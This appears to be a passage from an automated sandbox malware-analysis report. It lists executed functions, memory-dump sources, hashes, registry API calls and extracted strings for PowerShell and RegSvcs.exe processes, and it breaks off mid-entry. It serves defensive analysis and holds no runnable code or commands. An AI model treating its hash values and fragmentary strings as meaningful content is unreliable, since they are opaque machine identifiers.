Opcode Fuzzy Hash: 850affbbfadb6aabf14209831b7ff8e3f629e0223185a239b529c449ce96534e
Instruction Fuzzy Hash: C8A02208F0C002CBF0803320C0302BC008B8FE03A8F280032820F838C38E0CA808080B

Analysis Process: powershell.exePID: 1644, Parent PID: 6488COMMON

Executed Functions

Function 00007FF8489D0C3E Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2410046319.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8489d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba201c2094ac9547b79edc3f61d7de2eeecd18017ef2729e51667b37441f1dcc
Instruction ID: 40dc786c94c8e1d243c90e1ee9143bb8a93ab2dd2219825afdce08e6d25065d6
Opcode Fuzzy Hash: ba201c2094ac9547b79edc3f61d7de2eeecd18017ef2729e51667b37441f1dcc
Instruction Fuzzy Hash: C7510722E1EE865FFBA9B63C38592B96AD1EF55691F4801BBC40DC71C3DE08AC054749

Function 00007FF8489D0C8A Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2410046319.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8489d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f80df0a7f5446911a0b2640d382505c75a93dc44331ea582299f3dc492b637
Instruction ID: 8171d6fa250150ada8bd772c001dfdd809c37ff352716f321ebd227c838f8620
Opcode Fuzzy Hash: 62f80df0a7f5446911a0b2640d382505c75a93dc44331ea582299f3dc492b637
Instruction Fuzzy Hash: 1531B022E1FE866FFAA9B63C286917869D1EF556D2F4801BAD40DC31D3DE0CAC44461D

Function 00007FF8489095FE Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d796dbeeff7c5294459723266b789e29f9918bae1d7176599655443e6c0e21
Instruction ID: 6d809274c9660272596636417e3f393efc510b832c12d364b68717af7d5b0f98
Opcode Fuzzy Hash: 27d796dbeeff7c5294459723266b789e29f9918bae1d7176599655443e6c0e21
Instruction Fuzzy Hash: 8A312931D1DE890FD35AFB3888595A17FD2DF86241B0982BED049C72E7EE2878058354

Function 00007FF84890E21F Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea6e59c24f813e21ecd7355becf31316345a592f09a20aac7558736a7eb16fc
Instruction ID: b773fb530cb4846a035c1034739766738d27d3c187971a913fd083657fc3414c
Opcode Fuzzy Hash: 4ea6e59c24f813e21ecd7355becf31316345a592f09a20aac7558736a7eb16fc
Instruction Fuzzy Hash: 85112B21F1CC474FE359B63C44591BDAA82DFD7392F0882BAC049C72EBEE2858454384

Function 00007FF8489D2EF5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2410046319.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8489d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0cc4edd65eb45bce2752527bde44fb3cbbbcf3a68919ee5af33a8a9304783e7
Instruction ID: 1dd79d4a51478b2dd604d58000a1419528628f0e888f2bea85cfadda2fb54a93
Opcode Fuzzy Hash: a0cc4edd65eb45bce2752527bde44fb3cbbbcf3a68919ee5af33a8a9304783e7
Instruction Fuzzy Hash: 6801EFA680FBC60FE347537A08680907FB19E2316174E06EBC0C5CF1B3E48E185AC72A

Function 00007FF8489037B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 499782a85436c748c9745de400d045b42a67cca2cbc1106d65bb2c329d186d80
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 6201677111CB0D4FD744EF0CE451AAAB7E0FB95364F10056DE58AC3655D736E882CB45

Function 00007FF8489D1E8D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2410046319.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8489d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b7e2048fa0e2b0623ebfa173c5bda86474937644e4188ac0e51c988ab6f72a
Instruction ID: 9e41f4c61c4ce0d656654408a78093f9faf8ab67632a5b5bbec584f59040d0c0
Opcode Fuzzy Hash: 19b7e2048fa0e2b0623ebfa173c5bda86474937644e4188ac0e51c988ab6f72a
Instruction Fuzzy Hash: F9F05923F0DD5A1FF7A5A62C38192F49BC1DF549A1B0802B7C50CC3147DE044C140788

Function 00007FF8489054E1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82af515c0c8c9ad72d9ee17629b6441ba60c76668e35f83d0d863c7c984f8f36
Instruction ID: b17d081a42abab8b643c114f3e37e2dd543720def7d9f812628ac38bde925357
Opcode Fuzzy Hash: 82af515c0c8c9ad72d9ee17629b6441ba60c76668e35f83d0d863c7c984f8f36
Instruction Fuzzy Hash: F1F01774D0860F8FDB40EFA8C4855EEBBB0EF46351F204525C016EA290EB38AA448F94

Function 00007FF848909650 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 594712b79907145f958f02ab86b3917b0bc1bb9a9745890c442681a12eb6bdd7
Instruction ID: 46e9f4ba5b565c1a2f55ebab0173ee5fce84ac686adee407d7891013f4ac028b
Opcode Fuzzy Hash: 594712b79907145f958f02ab86b3917b0bc1bb9a9745890c442681a12eb6bdd7
Instruction Fuzzy Hash: 5FD01721B4CE1D0B9668B92CA80A16A73C2DBC9262B45867FE44ED2245DE2998820385

Function 00007FF848905FA5 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0a034da687b7e03ccef9b3aa329083b6f958f03b9b8e02b8e7c87f74c7f05c
Instruction ID: 3e238fcbab9634f638985aedf7a96310bae73fb80d2bcda6118d6016cc33678d
Opcode Fuzzy Hash: cf0a034da687b7e03ccef9b3aa329083b6f958f03b9b8e02b8e7c87f74c7f05c
Instruction Fuzzy Hash: B7E0D810B0C7858FE749FB38049653DADD09F47280F9050BDD85AC72D3ED6C5805D305

Function 00007FF8489091AF Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
Instruction ID: 88213207c40150f6d44f3d91774bdda3d7bff2771c9d28e9cbdaf030ee2a2901
Opcode Fuzzy Hash: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
Instruction Fuzzy Hash: 43C0803151C6114FD52E652440151357577FB46102B31507DDD87D71D6DF396C01C749

Function 00007FF84890E2C2 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2407942299.00007FF848900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848900000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a5c83b6a98d75cf5629a2d53223970be0b58fee48d6bd67eb53a66e4f0a8c4
Instruction ID: 330f30164d5f6fbfc77128036f32247613e4ecccce40176a5e026d75d8a6cf49
Opcode Fuzzy Hash: 50a5c83b6a98d75cf5629a2d53223970be0b58fee48d6bd67eb53a66e4f0a8c4
Instruction Fuzzy Hash: ADA0110AE0C8028AE0803320802803C08038B822A2F280232820A820C2AE08AA08208B

Analysis Process: RegSvcs.exePID: 7256, Parent PID: 3276COMMON

Execution Graph

Execution Coverage:	33.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	50%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01950ED8 Relevance: 1.6, APIs: 1, Instructions: 107
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetValueKey.NTDLL(?,?,?,?,?,?), ref: 01950F98

Memory Dump Source

Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 805ad4474ada3120d39fcf4ef6f22c20955f78a4d6d0395cfadc0ec2854b9838
Instruction ID: 5416cf8f4dc99fc39ea4e7ef22da6305af901c6873f89ffb50ee810b967ede54
Opcode Fuzzy Hash: 805ad4474ada3120d39fcf4ef6f22c20955f78a4d6d0395cfadc0ec2854b9838
Instruction Fuzzy Hash: 354176B9D042589FCF10CFA9D984A9EFBF5BB1A310F24A01AE818B7250D771A941CB64

Function 01950EE0 Relevance: 1.6, APIs: 1, Instructions: 104
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetValueKey.NTDLL(?,?,?,?,?,?), ref: 01950F98

Memory Dump Source

Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 2ed995f351bc607449c16bde76cd88f768e6f7b3ebab033fed5f8ad5ec4d06f1
Instruction ID: c4e1bf35da87170b55254b50d2ab991b59fdc9c81c330642e27d35334138ec7d
Opcode Fuzzy Hash: 2ed995f351bc607449c16bde76cd88f768e6f7b3ebab033fed5f8ad5ec4d06f1
Instruction Fuzzy Hash: 0F3165B9D042589FCF10CFA9D984A9EFBF5BB1A310F24A01AE818B7210D375A941CF64

Function 019509FA Relevance: .2, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 879a6ccc56a134426d9242d63b44b64e4d50c83ac7ca3c8f38a7bdd44f59c8c6
Instruction ID: 0e5b9ea85393bb77e4c551f06b98ce59aa99c1c1d8a35a01248946ccd8ef73f6
Opcode Fuzzy Hash: 879a6ccc56a134426d9242d63b44b64e4d50c83ac7ca3c8f38a7bdd44f59c8c6
Instruction Fuzzy Hash: 3D610434E01219CFCB64DFA8D894AEDFBB5BF49300F249169E809B7254DB30AA85CF54

Function 01950CB0 Relevance: 1.6, APIs: 1, Instructions: 112
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?), ref: 01950D84

Memory Dump Source

Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9b669dfd59cf0d767df27c059239be113c3c2d006940e7f45288aaa6cb58d710
Instruction ID: 77a52fa93e675343c8a9cad09a3ca255a3647aeab9da661c06d5d99867e3db61
Opcode Fuzzy Hash: 9b669dfd59cf0d767df27c059239be113c3c2d006940e7f45288aaa6cb58d710
Instruction Fuzzy Hash: 4D4177B9D042589FCB10CFA9D984ADEFBF5BF49310F14902AE918B7220D335A946CF64

Function 01950CB8 Relevance: 1.6, APIs: 1, Instructions: 108
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?), ref: 01950D84

Memory Dump Source

Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 69d137eb7bbb84f640e754aac435633b62f3e74dfc4e58053a2d63a5d92b3fa8
Instruction ID: 91365ab84003e168197b5bc53ab94ee45d1f0e4d53dedcf3dcaaf79d5beb8f2c
Opcode Fuzzy Hash: 69d137eb7bbb84f640e754aac435633b62f3e74dfc4e58053a2d63a5d92b3fa8
Instruction Fuzzy Hash: 104165B9D042589FCF10CFA9D984ADEFBF5BB49310F14902AE918B7220D375A946CF64

Function 01950FF9 Relevance: 1.6, APIs: 1, Instructions: 72
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(?), ref: 0195107D

Memory Dump Source

Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ab48001ac4f9f2a0c168f530cee0309e89019251cb0d0208ee5a58b9c6835a56
Instruction ID: 9fdc6350c6643250c49c8b82250f2f99418c6961db4dc96a98dba142b95dcbc5
Opcode Fuzzy Hash: ab48001ac4f9f2a0c168f530cee0309e89019251cb0d0208ee5a58b9c6835a56
Instruction Fuzzy Hash: E431A9B8D012589FCB10CFA9D984A9EFBF4FB49310F14902AE818B7311D735A941CF64

Function 01951000 Relevance: 1.6, APIs: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(?), ref: 0195107D

Memory Dump Source

Source File: 0000000B.00000002.2124984781.0000000001950000.00000040.00000800.00020000.00000000.sdmp, Offset: 01950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1950000_RegSvcs.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 07176289b7fc07686cbdc89f021e130aacce66f7a51216cfb9bab1650ce674d8
Instruction ID: fa14b2193f2bcd13cd33b75ce6d340a9472e8265aa4496b949ee66abd99955eb
Opcode Fuzzy Hash: 07176289b7fc07686cbdc89f021e130aacce66f7a51216cfb9bab1650ce674d8
Instruction Fuzzy Hash: D13198B8D012589FCB10CFA9D984A9EFBF4FB49310F14942AE818B7310D735A941CF64

Analysis Process: RegSvcs.exePID: 7296, Parent PID: 6528COMMON

Executed Functions

Function 064C0006 Relevance: 5.3, Strings: 3, Instructions: 1524COMMON

Download Yara Rule

Strings

fjq, xrefs: 064C00C8
fjq, xrefs: 064C0EF5
4'eq, xrefs: 064C195B

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: fjq$ fjq$4'eq
API String ID: 0-1006182435
Opcode ID: 65308ce1596d10406b11168efcf97df97358350e9f6f75d6449bd89bdf1493e1
Instruction ID: 7a9c435190c43dd01599809cf4609af37f47690ba5bf96e7f70bd044b5a5a0cc
Opcode Fuzzy Hash: 65308ce1596d10406b11168efcf97df97358350e9f6f75d6449bd89bdf1493e1
Instruction Fuzzy Hash: 34F20F78B10124DFC749EB64DAA4EAE77F2BF8C708F1146A5D4469B768DA306D42CF80

Function 064C0040 Relevance: 5.3, Strings: 3, Instructions: 1507COMMON

Download Yara Rule

Strings

fjq, xrefs: 064C00C8
fjq, xrefs: 064C0EF5
4'eq, xrefs: 064C195B

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: fjq$ fjq$4'eq
API String ID: 0-1006182435
Opcode ID: 7e9431a2fb16abc7c88afbce3d745685d2a7c5fed2fdd08036dcc25ce95ea8d5
Instruction ID: 9186dfc7205c5bc97122a7991c291d19fabd03e2ce1f73089c2dfa45478d2ed1
Opcode Fuzzy Hash: 7e9431a2fb16abc7c88afbce3d745685d2a7c5fed2fdd08036dcc25ce95ea8d5
Instruction Fuzzy Hash: 3AF2EF78B10124DFC749EB64DAA4EAE77F1BF8C708F1146A5D44A9B768DA306D42CF80

Function 064C237F Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

Ep, xrefs: 064C282E

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: 9bd17a0d74d89aec6d3f81de210f5ae3cc3d7556fca9a0cbd373ae509e204f20
Instruction ID: 8589311157afbfe4ee30751e84fd99dc990e00731c3a17d0954bab9372156370
Opcode Fuzzy Hash: 9bd17a0d74d89aec6d3f81de210f5ae3cc3d7556fca9a0cbd373ae509e204f20
Instruction Fuzzy Hash: 2DD12F74B00129CFD785EB28D6A8A6E7BF2FB88314F1145A9D4099B799DF349D42CF80

Function 064C2388 Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

Ep, xrefs: 064C282E

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: 4b97bc69e1f07a34e301f35dce85decbe8376ead82193d9a15370574924c3179
Instruction ID: a13793b086d0bf21abf20e855b5890fac5cd75be1a0fdc82a5aa3b2684646645
Opcode Fuzzy Hash: 4b97bc69e1f07a34e301f35dce85decbe8376ead82193d9a15370574924c3179
Instruction Fuzzy Hash: 0FC11E74B001298FD745EB28D6A8A6E7BF2FB88314F2145A9D409DB799DF349D42CF80

Function 064C2454 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

Ep, xrefs: 064C282E

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: cfd65021630a8c1e453e3ff720c8bf4d134617cf523989a0276aab85dc27be74
Instruction ID: 9769e4743b12c1c14b5e14993ae476db7b76b2773c5b02343c3582d0862643d4
Opcode Fuzzy Hash: cfd65021630a8c1e453e3ff720c8bf4d134617cf523989a0276aab85dc27be74
Instruction Fuzzy Hash: 55A11F74B001198FD745EB28D668A6E7BF2FB88314F2145A9E809DB799DF349D42CF80

Function 064C28F0 Relevance: 5.5, Strings: 4, Instructions: 481COMMON

Download Yara Rule

Strings

Hkq, xrefs: 064C2AA4
iq, xrefs: 064C2E90
PHeq, xrefs: 064C2D82
PHeq, xrefs: 064C2D94

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Hkq$PHeq$PHeq$iq
API String ID: 0-529301197
Opcode ID: c32ac43997b79751379a1442fe22d496e48ce0dc950fa8ce501d9e709afc699d
Instruction ID: 89af65cb0b8a5ff4bc4461458d8232b808998fb82f08f881f3ed4574248e55d2
Opcode Fuzzy Hash: c32ac43997b79751379a1442fe22d496e48ce0dc950fa8ce501d9e709afc699d
Instruction Fuzzy Hash: B2124D34A007058FCB65DF78C550A5EB7F2EF85310F648A6DD406AB3A5DBB4E982CB80

Function 064C3288 Relevance: 4.0, Strings: 3, Instructions: 259COMMON

Download Yara Rule

Strings

|>lq, xrefs: 064C3439
|>lq, xrefs: 064C3421
4'eq, xrefs: 064C3451

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'eq$|>lq$|>lq
API String ID: 0-3146283076
Opcode ID: 40fccd0c93295472e91ca5f8b48cf6eaff56aa02a7ffcf271c0c70e1414cee3e
Instruction ID: 5f5eb196826ace4b8c83545fa37c1aa231f4bbf354e1fb1fe156170eaa07ca42
Opcode Fuzzy Hash: 40fccd0c93295472e91ca5f8b48cf6eaff56aa02a7ffcf271c0c70e1414cee3e
Instruction Fuzzy Hash: 6031A4742047409FC357EF28D844A9B7FE6EF89310B58CA5EE0458F3A2DB21E9058B95

Function 00E909C9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON

Download Yara Rule

Strings

Teeq, xrefs: 00E90A98
Teeq, xrefs: 00E90A5F
p0@, xrefs: 00E90A8C

Memory Dump Source

Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Teeq$Teeq$p0@
API String ID: 0-3622955452
Opcode ID: ec6a9a72e0121cc0932369cadb79b88a8d355e26988d3a308952f5c4597b0ae8
Instruction ID: 08e9491aaa456e74cbecd4d3e357439c73ac2ddb221fb1b06fc413189a7c66f7
Opcode Fuzzy Hash: ec6a9a72e0121cc0932369cadb79b88a8d355e26988d3a308952f5c4597b0ae8
Instruction Fuzzy Hash: CE412674B101048FCB44DFA9D998AAEBBF2FF89310F2144A9E406EB3A1DA719D01CF50

Function 00E90BB0 Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

Teeq, xrefs: 00E90BE3
Teeq, xrefs: 00E90BF9

Memory Dump Source

Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Teeq$Teeq
API String ID: 0-1240912287
Opcode ID: 4ea20c80b221e739ce318ab2b3fa94def259579a6c77a2fcb02416dc389a2b00
Instruction ID: b1adfa103015262ab1286dbb1a746c5a5ca1c9479eb7b73169e2f4875e80dbf7
Opcode Fuzzy Hash: 4ea20c80b221e739ce318ab2b3fa94def259579a6c77a2fcb02416dc389a2b00
Instruction Fuzzy Hash: AE21D370B042444FDF059B7E8855BAEBBE2AF89300F648169E501EB3E2CE748C05CB91

Function 00E90BC8 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

Teeq, xrefs: 00E90BE3
Teeq, xrefs: 00E90BF9

Memory Dump Source

Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Teeq$Teeq
API String ID: 0-1240912287
Opcode ID: f9645988720a48d002528a2aa6c1a5a16ecb5b703b5ef1b64f027a6a94d40341
Instruction ID: 3ce11c4fa5c2e4bf0c3b91e82fe252ef77d6d2007c2f197fb8b60ac78b74ddf2
Opcode Fuzzy Hash: f9645988720a48d002528a2aa6c1a5a16ecb5b703b5ef1b64f027a6a94d40341
Instruction Fuzzy Hash: 01114570B002044FDB04DF7AC4957BEB6E6AF88700F609469E506AB391CE745C05CB54

Function 064C69C8 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

(iq, xrefs: 064C6AEB

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: b4fb81f3c45b507660e70edee6a9b389403b86e41c451aa82163e78d2e7ca86d
Instruction ID: 33a2ee4326b0518dce4f6534088cc1e2473f74d2012b3a0b5e69a9f5a73f86d4
Opcode Fuzzy Hash: b4fb81f3c45b507660e70edee6a9b389403b86e41c451aa82163e78d2e7ca86d
Instruction Fuzzy Hash: 11917E74B10118DFCB49EFA8D554AAE7BF2FF88304B108569D406AB7A4DB31AD42CF94

Function 064C268A Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

Ep, xrefs: 064C282E

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: 2ffc5133666779d5bbbdece8929ec2723d923a81e4d14974268a4931fd356304
Instruction ID: 16c2e2aeae360b8759681a6bbfd8056458ac7b81b31efe032464b14e6ffb717c
Opcode Fuzzy Hash: 2ffc5133666779d5bbbdece8929ec2723d923a81e4d14974268a4931fd356304
Instruction Fuzzy Hash: D9513C74F001198FC745EB68D5A8A6E7BF2FB88314F2046A9E4099B399DB349D42CF80

Function 064C2697 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

Ep, xrefs: 064C282E

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: 04610beeebe8f6078fbca5a2d60ae2a111a27235cfdba889ac57a14e75b3efe8
Instruction ID: 7ccb53d30fa641482e18b006a34b9d8bdea39485e39c47009b4489f98ae6d0b0
Opcode Fuzzy Hash: 04610beeebe8f6078fbca5a2d60ae2a111a27235cfdba889ac57a14e75b3efe8
Instruction Fuzzy Hash: CE511C74F001198FC745EB68D5A8A6E7BF2FB88314F2046A9E4099B799DB349D42CF80

Function 064C87D0 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

aeq, xrefs: 064C88A0

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: aeq
API String ID: 0-4159377277
Opcode ID: 1db7bf09e9f3da89f618cb3e5fbda06b447f6e0f83f8facd7cd02c4e9ba7c948
Instruction ID: 071a708aae1e0b4676aedfd5726eb8226565afee6c778b19b19872e2e3726880
